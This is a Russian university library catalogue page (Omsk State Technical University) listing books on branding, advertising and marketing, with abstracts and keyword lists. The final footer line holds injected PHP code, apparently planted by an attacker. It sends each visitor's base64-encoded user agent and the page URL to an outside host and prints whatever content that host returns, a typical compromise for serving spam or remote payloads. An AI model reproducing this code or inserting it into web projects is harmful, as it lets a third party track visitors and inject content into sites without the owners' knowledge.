Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

372 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=БРЕНД")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 368
1. 
Домнин, Владимир Николаевич. Брендинг: новые технологии в России [Текст] / В. Н. Домнин, 2004. - 380 с.
Держатели документа (Информация об экземплярах) 
2. 
Александров, Филипп. Хроники российской рекламы [Текст] : Учеб. пособие по специальности 350700 "Реклама" / Ф. Александров, 2003. - 344 с.

"Хроники российской рекламы" - это профессиональный разбор полетов известнейших российских реклам периода 1998-2002 годов; осмысление заслуженных побед и извлечение уроков из бесславных поражений с преъявлением вещественных доказательств. Это портрет российского <рекламного креатива> - порой "правильного", а порой "бессмысленного и беспощадного". Это по-настоящему увлекательные истории о <культурных корнях> той или иной рекламы, ее "ушах", прототипах, а когда и кальках. Это аплодисменты <рекламам-профи> и выведение на чистую воду <графоманских творений>. Это новейшая иллюстрированная <история российской рекламы>.

3. 
Бернадская, Юлия Сергеевна. Основы рекламного текста [Текст] : Учеб. пособие для вузов по специальности 350700 - Реклама / Ю. С. Бернадская, 2004. - 143 с.
Оглавление 
Держатели документа (Информация об экземплярах) 

Учебное пособие содержит теоретический материал, раскрывающий основные принципы создания рекламных текстов, и цикл упражнений, способствующий выработке у студентов практических навыков.

Предназначено для студентов очной и очно-заочной форм обучения специальности 350700 - Реклама.

Полный текст
4. 
Гуревич, Семен Моисеевич. Экономика отечественных СМИ [Текст] : Учеб. пособие для вузов по направлению 520600 и специальности 021400 "Журналистика" / С. М. Гуревич, 2004. - 287, [1] с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- СМИ -- ЖУРНАЛИСТИКА -- РЕДАКЦИОННЫЙ -- МЕНЕДЖМЕНТ -- МАРКЕТИНГ -- ДЕЯТЕЛЬНОСТЬ -- ЭКОНОМИЧЕСКАЯ -- КОНКУРЕНТОСПОСОБНОСТЬ -- ИНФОРМАЦИЯ -- ИНФОРМАЦИОННЫЙ -- РЫНОК -- МЕДИАБИЗНЕС -- ПЕРИОДИЧЕСКОЕ ИЗДАНИЕ -- ФИНАНСОВЫЙ -- ИНОСТРАННЫЙ -- КАПИТАЛ -- РЕДАКЦИЯ -- ФИНАНСОВАЯ -- РЕКЛАМНАЯ -- ЦЕНОВАЯ -- ПОЛИТИКА -- ЧАСТНОЕ ОБЪЯВЛЕНИЕ -- ИЗДАТЕЛЬСКАЯ -- КОММЕРЧЕСКАЯ -- ТЕЛЕРАДИОКОМПАНИЯ -- ИМИДЖ -- БРЕНД -- ДИЗАЙН -- БИЗНЕС-ПЛАН -- ЭТИКА -- ЗАКОНОДАТЕЛЬСТВО
Держатели документа (Информация об экземплярах) 

Цель пособия - дать студентам представление об экономике средств массовой информации (СМИ) как особой области практической деятельности и связанного с ней научного знания. Показать роль экономического фактора в возникновении и развитии журналистики. Пособие поможет выработке у студентов первичных навыков в области редакционного менеджмента и маркетинга. Эта книга должна способствовать формированию у профессиональных журналистов экономического мышления, пониманию своей роли в укреплении экономической базы издания и повышения его конкурентоспособности.

5. 
Аакер, Дэвид. Бренд-лидерство: новая концепция брендинга [Текст] / Д. Аакер, Э. Йохимштайлер; Пер. с англ.: Н. В. Кияченко и др., 2003. - 374 с.
Держатели документа (Информация об экземплярах) 
6. 
Макнелли, Дэвид. Как выделиться из толпы, или формула персонального брендинга [Текст] / Д. Макнелли, К. Д. Спик; Пер. с англ. К. Ткаченко, 2004. - 189, [1] с.
Держатели документа (Информация об экземплярах) 
7. 
ЛеПла, Ф. Джозеф. Интегрированный брендинг [Текст] / Ф. Д. ЛеПла, Л. М. Паркер; Под ред. А. Романченко; Пер. с англ. С. Г. Божук, 2003. - 318 с.
Держатели документа (Информация об экземплярах) 
8. 
Аакер, Дэвид А. Создание сильных брендов [Текст] / Д. А. Аакер; Пер. с англ. С. А. Старова и др., 2003. - 435 с.
Держатели документа (Информация об экземплярах) 
9. 
Шарков, Феликс Изосимович. Интегрированные бренд-коммуникации [Текст] / Ф. И. Шарков, 2004. - 243 с.
Держатели документа (Информация об экземплярах) 
10. 
Крейнер, Стюарт. Ключевые идеи менеджмента [Текст] : Пер. с англ. / С. Крейнер, 2002. - 346 с.
Держатели документа (Информация об экземплярах) 
11. 
Рекламный менеджмент. Опыт и практика [Текст] : Сб. ст. менеджеров / Рос. ассоц. реклам. агентств, Междунар. реклам. ассоц., 2003. - 143 с.
Держатели документа (Информация об экземплярах) 
12. 
Кеворков, Владимир Владимирович. Слоган [Текст] : Практ. рук. / В. В. Кеворков, 2003. - 132 с.
Держатели документа (Информация об экземплярах) 
13. 
Домнин, Владимир Николаевич. Брендинг: новые технологии в России [Текст] / В. Н. Домнин, 2002. - 348 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
14. 
Борисов, Борис Леонидович. Технология рекламы и PR [Текст] : Учеб. пособие / Б. Л. Борисов, 2001. - 617, [1] с.
Ключевые слова 
Реклама -- Паблик рилейшнз -- Маркетинговая коммуникация -- Товарный знак -- Бренд -- Франчайзинг -- Сми -- Средства массовой информации -- Имидж -- Стиль -- Pr -- Брендинг -- Учебник и пособие -- Crisis management -- ИНТЕРНЕТ - МАРКЕТИНГ -- БРЕНД -- БРЕНДИНГ -- ФРАНЧАЙЗИНГ -- ЗНАК ТОВАРНЫЙ -- СИМВОЛ -- СИМВОЛИКА -- РЕКЛАМА ПОЛИТИЧЕСКАЯ -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ -- СРЕДСТВА МАССОВОЙ ИНФОРМАЦИИ -- СОЦИОЛОГИЯ прикладная -- МЕДИАПЛАНИРОВАНИЕ -- Фокус-группа -- МИФ -- ТОТАЛИТАРИЗМ -- ТЕЛЕРЕКЛАМА -- ИМИДЖМЕЙКЕР -- Маркетинг политический -- ИМИДЖ политический -- СТИЛЬ фирменный -- СТИЛЬ русский -- Типографика -- Кич - Реклама -- Модерн - Реклама -- ПОСТМОДЕРНИЗМ - Реклама -- АВАНГАРД - Реклама -- АВАНГАРД РУССКИЙ -- Кинореклама -- СТИЛЬ жизни -- Монтаж -- КЛИП -- Юмор - Реклама -- Семиотика -- Структурализм -- РЕКЛАМА - СЛОВАРЬ ТЕРМИНОВ
15. 
Кнорре, Ксения. Наружная реклама [Текст] : учебное пособие / К. Кнорре, 2002. - 189 с.
Держатели документа (Информация об экземплярах) 
16. 
Васильева, Маргарита. Бренд: сила личности [Текст] / М. Васильева, А. Надеин, 2003. - 202 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
17. 
Шульц, Дон. Стратегические бренд-коммуникационные кампании [Текст] / Д. Шульц, Б. Барнс; Пер. с англ., 2003. - 506 с.
Держатели документа (Информация об экземплярах) 
18. 
Котлер, Филип. Маркетинг от А до Я [Текст] : 80 концепций, которые должен знать каждый менеджер / Ф. Котлер; Пер. с англ. Т. В. Виноградова и др.; Под ред. Т. Р. Тэор, 2003. - 219 с.
Держатели документа (Информация об экземплярах) 
19. 
Морозова, Ирина Георгиевна. Рекламный креатив: В поисках ненавязчивой идеи [Текст] : Учеб. пособие для вузов по специальности 350700 - "Реклама" / И. Г. Морозова, 2003. - 212 с.
Держатели документа (Информация об экземплярах) 

Вместо того чтобы работать с реальностью, рекламисты все чаще работают с ее абстрагированной схемой, представленной теоретическими науками. Но не кажется ли вам, что при живом общении с потребителем рекламе стоит опираться не на привычные схемы, а на реальную жизнь во всем ее многообразии? Эта книга - попытка объяснить, как реклама может жить рядом с людьми по их законам, говорить на их языке и исходить из их интересов.

Книга претендует не на создание новых клише "профессионального креатива", а на разрушение существующего культа схем и шаблонов. Честное профессиональное слово: мыслить реалиями жизни гораздо интереснее, чем абстрактными понятиями!

20. 
Психология [Текст] : Учеб. для экон. вузов / Р. Г. Аверкин, И. О. Александров, Н. А. Алмаев и др., 2000. - 671 с.
Ключевые слова 
Психология -- Учебник и пособие -- Мегапроект -- Психика -- Деятельность -- Психология деятельности -- Эмоция -- Чувство -- Поведение -- Внимание -- Память -- Мышление -- Интеллект -- Речь -- Общение -- Личность -- Человек -- Психология личности -- Социальная психология -- Психология социальная -- Труд -- Психология труда -- Предпринимательство -- Реклама -- Психология рекламы -- Организационная психология -- Организация -- Конфликт -- Клиническая психология -- Психология клиническая -- Психология экономическая -- Экономическая психология -- Психология предпринимательства -- Психология организационная -- ТРУД - Психология -- УТОМЛЕНИЕ - психология -- СТРЕСС психологический -- ДИАГНОСТИКА психологическая -- Прогностика психологическая -- ПРОФОРИЕНТАЦИЯ - ПСИХОЛОГИЯ -- ОТБОР ПРОФЕССИОНАЛЬНЫЙ -- Отбор психологический -- ПСИХОЛОГИЯ клиническая -- ПСИХИАТРИЯ клиническая -- ЗАБОЛЕВАНИЕ психическое -- Шизофрения -- Психопатия -- Психосоматика -- АЛКОГОЛИЗМ -- НАРКОМАНИЯ -- ТОКСИКОМАНИЯ -- РЕАБИЛИТАЦИЯ психологическая -- Психогигиена -- Психофармакология -- Стресс посттравматический -- ПСИХОЛОГИЯ ЭКОНОМИЧЕСКАЯ -- ПОВЕДЕНИЕ ДЕЛОВОЕ -- Психология денег -- Поведение экономическое -- ПОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКОЕ -- ПРИНЯТИЕ РЕШЕНИЙ -- ПСИХОЛОГИЯ предпринимательства -- Бизнес - консультирование -- ПСИХОЛОГИЯ рекламы -- РЕКЛАМА - Психология -- ПРЕДПРИНИМАТЕЛЬСТВО - ПСИХОЛ -- ИМИДЖ рекламный -- бренд - психология -- ПСИХОЛОГИЯ организационная -- МОТИВАЦИЯ ПЕРСОНАЛА -- КУЛЬТУРА ОРГАНИЗАЦИОННАЯ -- КОНФЛИКТ - ПСИХОЛОГИЯ -- ПСИХОЛОГИЯ - СЛОВАРЬ ТЕРМИНО


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2814 - 22.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.96 с.12 запросов, 1.67c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;